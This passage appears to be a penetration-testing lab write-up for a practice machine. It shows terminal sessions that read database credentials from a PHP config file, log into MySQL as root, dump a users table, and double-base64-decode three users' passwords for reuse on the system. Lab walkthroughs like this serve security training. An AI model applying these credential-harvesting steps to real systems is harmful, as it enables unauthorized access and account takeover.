MySQL
Checking for DB credentials after performing a manual system enumeration
bash-4.2$ ll
total 76K
4.0K drwxr-xr-x. 8 root root 4.0K Jul 15 2020 .
4.0K -rw-r--r--. 1 root root 145 Jul 15 2020 db.php
4.0K -rw-r--r--. 1 root root 2.7K Jun 10 2020 index.php
0 drwxr-xr-x. 2 root root 6 Jun 10 2020 photos
0 drwxr-xr-x. 2 root root 44 Jun 10 2020 css
0 drwxr-xr-x. 3 root root 225 Jun 10 2020 images
0 drwxr-xr-x. 2 root root 142 Jun 10 2020 js
0 drwxr-xr-x. 2 root root 6 Jun 10 2020 phpGallery_thumbs
0 drwxr-xr-x. 2 root root 6 Jun 10 2020 phpGallery_images
0 drwxr-xr-x. 4 root root 33 Jun 9 2020 ..
8.0K -rw-r--r--. 1 root root 4.5K Jun 8 2020 image.php
4.0K -rw-r--r--. 1 root root 4.0K Jun 8 2020 README.txt
4.0K -rw-r--r--. 1 root root 1.7K Jun 8 2020 UpgradeInstructions.txt
8.0K -rw-r--r--. 1 root root 6.3K Jun 8 2020 embeddedGallery.php
4.0K -rw-r--r--. 1 root root 2.1K Jun 8 2020 functions.php
20K -rw-r--r--. 1 root root 19K Jun 8 2020 license.txt
4.0K -rw-r--r--. 1 root root 1.6K Jun 8 2020 phpGalleryConfig.php
4.0K -rw-r--r--. 1 root root 619 Jun 8 2020 phpGalleryStyle-RED.css
4.0K -rw-r--r--. 1 root root 509 Jun 8 2020 phpGalleryStyle.css
4.0K -rw-r--r--. 1 root root 2.6K Jun 8 2020 thumbnail_generator.phpdb.php
bash-4.2$ cat db.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>DB credential identified; root:MalapropDoffUtilize1337
root session
bash-4.2$ mysql -h 127.0.0.1 -uroot -pMalapropDoffUtilize1337
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 102
Server version: 8.0.20 MySQL Community Server - GPL
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> Bye
bash-4.2$ It entered, Bye, and exited.
Going manual with the -e flag
bash-4.2$ mysql -h 127.0.0.1 -uroot -pMalapropDoffUtilize1337 -e 'SHOW databases;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------------+
| Database |
+--------------------+
| SimplePHPGal |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+SimplePHPGal DB
bash-4.2$ mysql -h 127.0.0.1 -uroot -pMalapropDoffUtilize1337 -e 'SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema="SimplePHPGal";'
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------+------------+
| TABLE_SCHEMA | TABLE_NAME |
+--------------+------------+
| SimplePHPGal | users |
+--------------+------------+
bash-4.2$ mysql -h 127.0.0.1 -uroot -pMalapropDoffUtilize1337 -e 'SELECT * FROM SimplePHPGal.users;'
mysql: [Warning] Using a password on the command line interface can be insecure.
+----------+----------------------------------------------+
| username | password |
+----------+----------------------------------------------+
| josh | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== |
| serena | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== |
+----------+----------------------------------------------+Found credential strings? They don’t look like hash strings. They look more like a base64 string
Base64 Decoding
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ echo VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= | base64 -d | base64 -d
MobilizeHissSeedtime747Password decoded for the josh user; MobilizeHissSeedtime747
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ echo U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ== | base64 -d | base64 -d
HockSydneyCertify123Password decoded for the michael user; HockSydneyCertify123
michael is a valid system user
The credential will be validated
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/snookums]
└─$ echo VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ== | base64 -d | base64 -d
OverallCrestLean000Password decoded for the serena user; OverallCrestLean000